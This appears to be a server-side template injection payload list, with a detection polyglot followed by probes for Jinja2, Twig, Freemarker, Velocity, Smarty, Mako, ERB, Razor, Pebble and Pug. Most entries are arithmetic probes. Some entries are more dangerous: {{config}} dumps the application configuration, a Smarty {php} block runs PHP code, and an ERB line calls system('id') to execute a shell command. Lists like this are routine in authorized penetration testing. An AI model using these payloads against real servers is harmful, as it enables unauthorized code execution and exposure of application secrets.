# Detection polyglot
${{<%[%'"}}%\.

# Basic math operations (detect template engine)
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
@(7*7)
{{7*'7'}}
[% 7*7 %]

# Jinja2 / Twig detection
{{config}}
{{config.items()}}
{{self}}
{{self.__class__}}
{{request}}

# Twig specific
{{_self}}
{{_self.env}}

# Freemarker
${7*7}
${class}
<#assign x=7*7>${x}

# Velocity
#set($x=7*7)$x
$class

# Smarty
{$smarty.version}
{php}echo 'test';{/php}

# Mako
${7*7}
<% x=7*7 %>${x}

# ERB (Ruby)
<%= 7*7 %>
<%= system('id') %>

# Razor (.NET)
@(7*7)
@{var x=7*7;}@x

# Pebble
{% set x=7*7 %}{{x}}

# Jade/Pug
#{7*7}
- var x = 7*7
= x
